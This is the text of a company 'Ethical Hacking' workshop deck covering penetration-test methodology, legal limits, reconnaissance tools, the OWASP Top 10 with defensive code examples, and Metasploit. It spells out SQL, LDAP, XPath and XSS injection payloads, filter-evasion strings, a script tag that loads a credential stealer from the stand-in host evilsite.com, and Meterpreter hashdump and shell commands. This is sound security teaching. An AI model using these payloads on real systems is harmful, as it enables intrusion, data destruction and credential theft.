
Summary

#centopercentonoi

Elmec Informatica S.p.A. | Via Pret, 1 | 21020 Brunello (VA) | www.elmec.com 1


Agenda

Monday 14th 2018

09:00 - 09:15 | Company Presentation
09:15 - 11:15 | Workshop "Ethical Hacking"
11:30 - 12:30 | Aptitude Test
14:00 - 14:30 | Technical Test
14:30 - 16:30 | Business Game "Capture the flag"

Thursday 17th 2018

12:30 - 13:00 | Kahoot!
13:00 - 13:15 | Company Identity
13:15 - 15:00 | Workshop "Ethical Hacking"
13:00 - 16:30 | Business Game "Capture the flag"



Group revenue 2017: 220,000,000 €
650+ employees
70% specialised technicians

[Pie chart: Informatica 45.3% | Eolo 45.1% | Elmec Spa 6.6% | Solar 2.2% | Suisse 0.6% | Trub 0.1%]

Offices: Lombardia (5), Veneto, Emilia Romagna, Svizzera
Growth over the last 3 years: +60,000,000 € (+38%)

OUR PARTNERS



LinkedIn – Elmec Careers Page



Ethical Hacking
Marco Mazzarini



Summary
AGENDA

• Introduction to Ethical Hacking
• How to become an Ethical Hacker
• Penetration Test
• Analysis of an attack
• Common attack vectors
• Common Vulnerabilities
• Q&A



Hacking
Hacking?

The word hacking comes from «to hack», which means «to alter». People who practise
hacking are called hackers: their purpose is to gain a deep knowledge of the
system they are using, so that they can access it and even adapt it to their
needs. [wikipedia]

https://en.wikipedia.org/wiki/Hacking



Ethical Hacking
Ethical Hacker

The term hacking, in computer jargon, often carries a negative meaning, since the
collective imagination identifies it with operations and behaviours that are
completely illegal. However, hacking actually includes a series of perfectly legal
activities, carried out also at a professional level: IT systems are in fact
subjected to specific and constant tests in order to evaluate and prove their
safety and reliability. [wikipedia]

https://en.wikipedia.org/wiki/Hacking



Summary
Coloured hat?

• White Hat - a hacker who opposes the abuse of computer systems. His activity is
a coordinated and comprehensive verification of the security of a network and of
the systems that compose it. He specialises in penetration testing and in all the
methods for testing the security of computer systems.
• Grey Hat - even if his purpose is not that of a Black Hat, he sometimes crosses
the boundary of legality.
• Black Hat (Cracker / Wannabe / Lamer) - malicious hackers or criminals with
different levels of skill.



Black Hat



Ethical Hacking
Art of Ethical Hacker

Ethical hacking is an "art" in the sense that the "artist" must possess the skills and
knowledge of a potential attacker (to imitate an attack) and the resources with
which to mitigate the vulnerabilities used by attackers. [SANS]

https://www.sans.org/reading-room/whitepapers/auditing/red-teaming-art-ethical-hacking-1272



Ethical Hacking
The path of an Ethical Hacker

Must have:
The desire to learn ☺

Ideal path

• Knowledge of Linux (LPIC, RHCA, etc.)
• Knowledge of Windows, client and server (sysadmin, MCSA)
• Knowledge of Network and Cloud (CCNA, Network+, etc.)
• Knowledge of programming (Python, bash, VBasic, C++, etc.)
• Knowledge of web technologies (jQuery, HTML5, PHP, JavaScript, NodeJs, etc.)
• Knowledge of databases (MongoDB, MSSQL Server, MySQL, Oracle, etc.)
• Knowledge of security (CEH, SANS GPEN, OSCP, etc.)
• Knowledge of tools, «Think different», English, management, etc.



Legal Agreement
Legal Agreement

Anyone who unlawfully gains access to a computer or telecommunications system
protected by security measures, or remains there against the express or implied
will of those entitled to exclude him, is punished with imprisonment of up to
three years.

It is therefore necessary to sign a legal agreement defining the purpose and the
limits within which it is possible to act, namely:
• IP addresses to test
• IP addresses from which the attacks originate
• methods and tools to use
• time windows
• the start conditions
• completion of the tests
• processing of the information collected
https://www.brocardi.it/codice-penale/libro-secondo/titolo-xii/capo-iii/sezione-iv/art615ter.html



Vulnerabilities
Vulnerabilities
A vulnerability can be understood as a component of a system in which the
security measures are absent, reduced or compromised: a weak point in the
system that allows an attacker to lower its level of security. [wikipedia]

https://it.wikipedia.org/wiki/Vulnerabilit%C3%A0



Vulnerabilities
Vulnerabilities

Common Vulnerability Scoring System v3.0

• Attack Vector
• Attack Complexity
• Privileges Required
• User Interaction
• Scope
• Confidentiality Impact
• Integrity Impact
• Availability Impact

https://www.atlassian.com/trust/security/security-severity-levels



Vulnerabilities
Vulnerabilities

A system can be said to be vulnerable if it is possible to:

• access internal resources
• read and edit confidential files
• inspect the incoming and/or outgoing traffic
• run programs without permission
• obtain administrator permissions (root) from a non-privileged user
• change the configuration of the network and services.

https://it.wikipedia.org/wiki/Vulnerabilit%C3%A0



Penetration Test
Penetration Test

The penetration test is the methodology for evaluating the security of a system or a
network.
• Divided into several phases
• Highlights weaknesses
• Provides information on vulnerabilities

A pen-test has to test the security of a system by trying to violate it with a
variety of attacks, providing a clear estimate of its defence capabilities and threat
resilience.

http://www.nsaitalia.it/penetration-test.php



Penetration Test
Methodology

Knowledge level:
• zero knowledge (black box): no information is provided
• partial knowledge (gray box): a little information is provided
• full knowledge (white box): most of the information is known to the tester

Other scenarios:
• social engineering: testing the vulnerability of a company's employees
• physical security: the ease of access to areas that are not normally allowed.

http://www.nsaitalia.it/penetration-test.php



Penetration Test
Results and Report

The report must indicate for each vulnerability found:

• Software / device affected by the vulnerability (name and version)
• Type of vulnerability found
• Severity of the bug (Low, Medium, High, Critical)
• Detailed description of the problem and the methods used to identify it
• Tips for mitigation / correction and notes.
http://www.nsaitalia.it/penetration-test.php



Analysis of an attack

https://en.wikipedia.org/wiki/Kill_chain



Reconnaissance
Reconnaissance

Objective: email, FQDN, IP, ports and other valuable information.

You can search for target’s domains and keyword with:

• Search Engine like Google / Bing / Yahoo / DuckDuckGo.

• Google Dorks https://www.exploit-db.com/google-hacking-database/

Example: filetype:pdf site:cnn.com password

Example: inurl:"-wp13.txt"

• Whois, Dig, Nslookup

• Social Network



Reconnaissance
Reconnaissance

• You can leverage https://www.wappalyzer.com/ to retrieve technologies used

• Fierce Tool: retrieves information about domains and subdomains

fierce -dns example.com

• Hping – gathers OS info

hping example.com -S -V -p 443

• TheHarvester – finds email using Search Engines

theharvester -d example.com -l 500 -b google



Reconnaissance
Reconnaissance – Nmap

Nmap is a tool used to launch network scans:

nmap --help

nmap -sT 192.168.1.1 # TCP connect scan of the default (top 1000) ports

nmap -p 80,443 192.168.1.1 # scan only ports 80 and 443 (-F, fast mode, cannot be combined with -p)

nmap -v -sS -A -T4 192.168.1.1 # verbose, SYN ("stealth") scan, OS/version detection, aggressive timing



Reconnaissance
Reconnaissance

• It is a best practice to put the various pieces together, even with the help of
graphical tools like Maltego.



Web Application Security Scanner
Interact with a Web server

The most common way to interact with a web server is a browser: a program that
sends requests using the HTTP(S) protocol and renders the replies.

GET and POST are the most common methods (but you can also find HEAD, PUT,
DELETE, TRACE, OPTIONS and CONNECT).

• GET
www.example.org/demo_form.php?name1=value1&name2=value2

• POST
POST /test/demo_form.php HTTP/1.1
Host: w3schools.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

name1=value1&name2=value2



Web Application Security Scanner
Status codes
• 1xx: Informational
• 2xx: Successful
• 3xx: Redirection (there is no immediate answer, but the request is correct and
the response tells the client how to get the answer)
• 4xx: Client error (the request cannot be satisfied because it is wrong)
• 5xx: Server error (the request cannot be satisfied due to an internal server
problem)

Common status codes:

• 200 OK
• 301 Moved Permanently
• 302 Found
• 400 Bad Request
• 404 Not Found
• 500 Internal Server Error



Web Application Security Scanner
Web Application Security Scanner
To make a more in-depth, manual analysis it is necessary to use a tool that
intercepts web requests.

The most used tools are «Burp Suite» and «ZAP»: intercepting proxies that sit as a
man-in-the-middle between the browser and the web server.



Web Application Security Scanner
Web Application Security Scanner
From the “options” menu you can configure the listening port (and other parameters),
which must match the proxy port set in your preferred browser.



OWASP
OWASP

• The Open Web Application Security Project (OWASP) is an open-source project
created to make developers aware of security issues; it offers guidelines on
building secure Internet applications.
• Famous for its "Top 10" of the risks caused by errors on the developers' side,
which is drawn up every year.





OWASP
OWASP

• The "standard" risk is calculated as Probability x Damage, and goes from the
"Low" level to the "Critical" level

R=PxD



OWASP
Injection

• Any data source can be an injection vector: environment variables, parameters,
internal and external services, users, etc.
• The vulnerability appears when an attacker can send arbitrary data to the
interpreter.



OWASP
Injection

SQL Injection Example:

Missing or incomplete validation of input: the application trusts the user and its
input values. These are programming errors.

"SELECT * FROM accounts WHERE custID='" + request.getParameter("id") + "'";

A legitimate query could be:

SELECT * FROM accounts WHERE custID='5'

The attacker modifies the 'id' parameter and appends: ' or '1'='1
http://example.com/app/accountView?id=5' or '1'='1

SELECT * FROM accounts WHERE custID='5' or '1'='1';



OWASP
Injection

What if the attacker wants to delete the entire content of a table?

• a'; DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't

• You can execute any SQL statement that the database account used by the web
application is authorised to run

Other examples:

• id=1) OR SLEEP(25)=0 LIMIT 1--

• 1 AND if((ascii(lower(substring((select
user()),$i,1))))!=$s,1,benchmark(200000,md5(now())))

• union%20%64istinctRO%57%20select

• +UnIOn%0d%0aSeleCt%0d%0a



OWASP
Injection

Other Injection attacks

• Code Injection: typically OS commands, for example:

o DIR/LS/CD, PING, ECHO, telnet/ssh/netcat
o http://www.site.com/get-files?file=../../../../dir/file (path traversal)

• Blind SQL Injection: I can't see the results, but...

o http://www.site.com/app.php?id=1' waitfor delay '00:00:10'--

• Blind XPath Injection: using XML

o //Employee[UserName/text()='blah' or 1=1 or 'a'='a' and Pass/text()='blah']

• LDAP injection: using the LDAP protocol

o user=*)(uid=*))(|(uid=* pass=password



OWASP
Injection

Why it happens…

• The data provided by the user is not checked or sanitised by the app
• Queries or commands are executed directly by the interpreter
• The commands are built by direct use or concatenation of: parameters, headers,
URLs, cookies, JSON, SOAP and XML

How to prevent it?
• The database account used by the application must have limited privileges
• Use positive input validation (a server-side whitelist)
• Escape special characters according to the database syntax
• Use safe and verified APIs
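An added example (not from the slides) that reproduces the accountView query from the SQL Injection slide against an in-memory SQLite table, first built by string concatenation and then as a parameterised query, together with the positive input validation recommended above; the table contents are constructed sample data.

```python
import sqlite3

# Constructed sample data standing in for the slide's 'accounts' table.
ACCOUNTS = [("5", "alice", 1200.0), ("7", "bob", 300.0), ("9", "carol", 9800.0)]

def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE accounts (custID TEXT PRIMARY KEY, owner TEXT, balance REAL)")
    db.executemany("INSERT INTO accounts VALUES (?, ?, ?)", ACCOUNTS)
    return db

def account_view_vulnerable(db, cust_id):
    # Same construction as the slide: the user-controlled value is concatenated
    # into the statement, so a quote character changes the statement's structure.
    query = "SELECT owner, balance FROM accounts WHERE custID='" + cust_id + "'"
    return db.execute(query).fetchall()

def account_view_safe(db, cust_id):
    # Parameterised query: the driver binds the value as data, so it can never
    # be interpreted as SQL, whatever characters it contains.
    return db.execute(
        "SELECT owner, balance FROM accounts WHERE custID=?", (cust_id,)
    ).fetchall()

def looks_like_injection(value):
    """Positive (whitelist) validation for this parameter: custID must be digits
    only. The parameterised query is the real fix; this check rejects malformed
    input early and is a useful signal to log and alert on."""
    return not value.isdigit()

if __name__ == "__main__":
    db = make_db()
    tampered = "5' or '1'='1"   # the payload from the slide
    print(account_view_vulnerable(db, "5"))       # one row
    print(account_view_vulnerable(db, tampered))  # every row: the WHERE clause is always true
    print(account_view_safe(db, tampered))        # no rows: no customer has that literal ID
    print(looks_like_injection(tampered))         # True
```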



OWASP
Broken Authentication

The most feared attack, as it violates the authentication system and the
information behind it, such as:
• Sensitive personal information (PII)
• Credentials
• Medical records
• Personal data
• Credit cards

There are several regulations (ISO 27001, GDPR, etc.) that regulate, strengthen
and harmonise the protection of personal data.





OWASP
Broken Authentication

Why it happens…

• The attacker has a list of valid usernames and passwords
• The application allows brute force or other automated attacks
• It allows default, weak, or well-known passwords, such as "Password1" or
"admin / admin"
• It uses weak or ineffective credential recovery, such as "security questions"
• It stores passwords weakly encrypted or hashed, or even in plaintext
• Two-factor (or multi-factor) authentication is not implemented properly
• It exposes the "Session ID" in the URL
• It does not change the "Session ID" after a successful login
• It does not correctly handle expired Session IDs



OWASP
Cross-Site Scripting (XSS)

Cross-site scripting (XSS) is a vulnerability that affects dynamic websites with
insufficient validation of the input received through their forms.

An XSS allows a cracker to inject and execute client-side code.

The technique can use any client-side scripting language, including JavaScript,
VBScript, Flash and HTML.

An XSS allows the collection, manipulation and redirection of confidential
information, the viewing and editing of data on servers, the alteration of the
dynamic behaviour of web pages, etc.



OWASP
Cross-Site Scripting (XSS)

Three different types of XSS:

• Non Persistent

• Persistent

• DOM (Document Object Model)



OWASP
Cross-Site Scripting (XSS)

The fastest way to check for a cross-site scripting (XSS) vulnerability is to enter
the following code in some input field:

<script type='text/javascript'>alert('xss');</script>

For this type of XSS (Non Persistent) the result is immediately visible, but only to
the user who generated it.



OWASP
Cross-Site Scripting (XSS)

The evolution of the previous type of XSS is persistence: the injected code is
stored and executed every time the page is loaded.

<script src="http://evilsite.com/authstealer.js"></script>

The black hat's goal is to get similar code onto a page viewed by the administrator,
often with slight variations:

<IMG SRC=javascript:alert('XSS')>

<IMG SRC= onmouseover="alert('xxs')">



OWASP
Cross-Site Scripting (XSS)

Various filters or a Web Application Firewall can be evaded with obfuscation
techniques such as:
<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&">

Set.constructor`alert\x28document.domain\x29```

Online cheat sheets summarise the most common obfuscation methods.



OWASP
Cross-Site Scripting (XSS)

DOM XSS:

<script>
document.write("<b>Current URL</b> : " + document.baseURI);
</script>

http://www.example.com/test.html#<script>alert(1)</script>

DOM XSS cannot be blocked by server-side filters: anything after the "#" (hash)
is never sent to the server.

HTML modification sinks:
• document.write / (element).innerHTML
HTML modification that changes behaviour:
• (element).src (in certain elements)
Execution-related sinks:
• eval / setTimeout / setInterval / execScript



OWASP
Cross-Site Scripting (XSS)

How to avoid them?

• Use frameworks that escape by design
• Escape untrusted HTTP request data according to the context of the HTML output
(body, attribute, JavaScript, CSS, or URL), using the 'XSS Prevention' Cheat Sheet
as a base.
• Install a WAF (web application firewall)
• For DOM XSS, use innerText / textContent instead of innerHTML
• Use CSP: Content Security Policy
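As an added example (not from the slides), a small context-aware output encoder in Python that implements the "escape according to the context" rule above (HTML body, quoted attribute, JavaScript string, URL) and is checked against the probe strings shown on the earlier XSS slides; the `render_profile` page fragment and its field names are constructed for the demonstration.

```python
import html
import json
from urllib.parse import urlsplit

# Untrusted inputs: the probe strings from the XSS slides plus an attribute breakout (constructed).
PAYLOADS = [
    "<script type='text/javascript'>alert('xss');</script>",
    "<IMG SRC=javascript:alert('XSS')>",
    '" onmouseover="alert(1)',
]

def escape_html_body(value):
    """Text placed between tags: <, >, &, quotes become entities, so no new tag
    or attribute can start."""
    return html.escape(value, quote=True)

def escape_html_attribute(value):
    """Text placed in an attribute: always wrap in double quotes and escape the
    quote, otherwise a payload closes the attribute and adds an event handler."""
    return '"' + html.escape(value, quote=True) + '"'

def escape_js_string(value):
    """Text placed inside a <script> string literal: JSON encoding yields a valid
    JS string; '<' and '>' are hex-escaped as well so the sequence '</script>'
    cannot terminate the script block."""
    return json.dumps(value).replace("<", "\\u003c").replace(">", "\\u003e")

SAFE_SCHEMES = {"http", "https", "mailto"}

def safe_url(value):
    """Text placed in src/href: only whitelisted schemes are accepted, so a
    'javascript:' URL like the IMG SRC payload is rejected rather than escaped.
    Returns the attribute-escaped URL, or None when rejected."""
    scheme = urlsplit(value.strip()).scheme.lower()
    if scheme and scheme not in SAFE_SCHEMES:
        return None
    return html.escape(value, quote=True)

def render_profile(nickname, homepage):
    """Assemble a page fragment, choosing the encoder by where each value lands."""
    href = safe_url(homepage) or "#"
    return (
        "<p>Hello " + escape_html_body(nickname) + "</p>\n"
        '<a href="' + href + '" title=' + escape_html_attribute(nickname) + ">site</a>\n"
        "<script>var nick = " + escape_js_string(nickname) + ";</script>"
    )

if __name__ == "__main__":
    for p in PAYLOADS:
        print(escape_html_body(p))
    print(safe_url("javascript:alert('XSS')"))            # None: rejected
    print(render_profile(PAYLOADS[0], "https://example.org/"))
```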



OWASP
Exposure

How does it happen?
• Data is transmitted in clear text (HTTP, SMTP, FTP), also internally (between
load balancers, web servers, or back-ends)
• Sensitive data is stored in clear text, including backups
• Weak or old encryption algorithms are used
• Default, weak or reused cryptographic keys are used, or key management is
missing
• Encryption is not enforced
• The client does not check the validity of the certificate



OWASP
Exposure

How does it happen?
• With the historical Ettercap, or the more recent Bettercap, it is possible to
perform a man-in-the-middle attack, provided the attacker is on the same network as
the target.



OWASP
Exposure

How to prevent it?
• Classify the data processed, stored, or transmitted by the application
• Apply controls according to the classification
• Do not store sensitive data unless necessary. Data not stored can't be stolen ☺
• Encrypt all sensitive data
• Use up-to-date algorithms, protocols and procedures
• Encrypt data in transit (TLS)
• Disable caching for responses containing sensitive data
• Store passwords hashed with a salt
• Perform external audits
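An added example (not from the slides) covering two controls from this section: the "hashing + salt" password storage recommended above, and the session handling whose absence the Broken Authentication slide lists (predictable IDs, no rotation after login, no expiry). The PBKDF2 iteration count and the 15-minute idle timeout are assumptions of this demo, not values from the deck.

```python
import hashlib
import hmac
import os
import secrets
import time

PBKDF2_ITERATIONS = 600_000   # assumption: current OWASP guidance for PBKDF2-HMAC-SHA256

def hash_password(password, salt=None):
    """Hash + per-user random salt. The salt is stored next to the digest; it is
    not secret, its job is to defeat precomputed (rainbow) tables."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return salt.hex() + "$" + digest.hex()

def verify_password(password, stored):
    """Recompute with the stored salt and compare in constant time."""
    salt_hex, digest_hex = stored.split("$")
    recomputed = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), PBKDF2_ITERATIONS)
    return hmac.compare_digest(recomputed.hex(), digest_hex)

class SessionStore:
    """Server-side sessions: unpredictable IDs, a new ID after login, strict expiry.
    'clock' is injectable so expiry can be tested without sleeping."""
    def __init__(self, ttl_seconds=900, clock=time.time):
        self.ttl = ttl_seconds
        self.clock = clock
        self._sessions = {}   # session id -> {"user": ..., "expires": ...}

    def _new_id(self):
        return secrets.token_urlsafe(32)   # 256 bits from the OS CSPRNG

    def anonymous(self):
        """Pre-login session, e.g. for a shopping basket."""
        sid = self._new_id()
        self._sessions[sid] = {"user": None, "expires": self.clock() + self.ttl}
        return sid

    def login(self, old_sid, user):
        """Successful login: discard the pre-login ID and issue a fresh one, so an
        ID an attacker planted or observed before login is worthless afterwards."""
        self._sessions.pop(old_sid, None)
        sid = self._new_id()
        self._sessions[sid] = {"user": user, "expires": self.clock() + self.ttl}
        return sid

    def user_for(self, sid):
        """Resolve a session ID; unknown or expired IDs are rejected and purged."""
        s = self._sessions.get(sid)
        if s is None:
            return None
        if self.clock() > s["expires"]:
            del self._sessions[sid]
            return None
        return s["user"]

if __name__ == "__main__":
    record = hash_password("correct horse battery staple")
    print(verify_password("correct horse battery staple", record))  # True
    print(verify_password("Password1", record))                     # False
    store = SessionStore(ttl_seconds=60)
    pre = store.anonymous()
    post = store.login(pre, "alice")
    print(pre != post, store.user_for(pre), store.user_for(post))   # True None alice
```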



OWASP
Vulnerable Components

How does it happen?

• The versions of the components in use (server / client) are not known
• The software is vulnerable, no longer supported or out of date
• No periodic scans are done
• Software is not updated quickly (with the help of security bulletins)
• Developers do not adequately verify the updates of the various components
• The components are not configured properly



OWASP
Vulnerable Components

There are tools that scan for vulnerabilities automatically, for example
Nessus, Core Impact, Acunetix and OpenVAS.



OWASP
Vulnerable Components

You can manually search for vulnerabilities based on the version of components
used, using websites that list vulnerabilities by categories.

Pro:
• Unnoticed
• Less likely to cause a malfunction
• More precise

Cons:
• Slow
• Tests or important checks can be skipped
• Human Error



MSF
Metasploit Framework

Metasploit is a penetration test framework that allows you to find, exploit and
validate vulnerabilities.

Inside this framework there are a ton of useful tools configured in such a way that
they can work together in the best way.



MSF
Metasploit Framework

You can start msfconsole once the prerequisites are met



MSF
Metasploit Framework

You can run the different auxiliary modules against the targets:



MSF
Metasploit Framework

You can run the tools against the targets:



MSF
Metasploit Framework

You can configure the tools before starting the attack:



MSF
Metasploit Framework

Until you can «reach» the target ☺

You can also go further



MSF
Metasploit Framework

Meterpreter let you use the devices’s webcam:

• webcam_snap -h

Or let you execute «post exploitation» actions:

• run post/windows/gather/hashdump

• execute -f cmd.exe -i -H

• download c:\\myfile.txt

• shell





OWASP
Recapping…

• Always keep yourself up to date with the latest news ☺
• Update the software and devices in use
• Monitor the security status of systems, keeping logs and doing audits
• Always back up to a safe place
• Enable 2-factor authentication
• Always sanitise the input [WEB]
• Encrypt devices
• Use secure channels (SSL/TLS)
• Never trust ☺



Q&A



Thanking

Thank you!
Marco Mazzarini
Marco.mazzarini@elmec.it



Getting ready
Preparation for the test
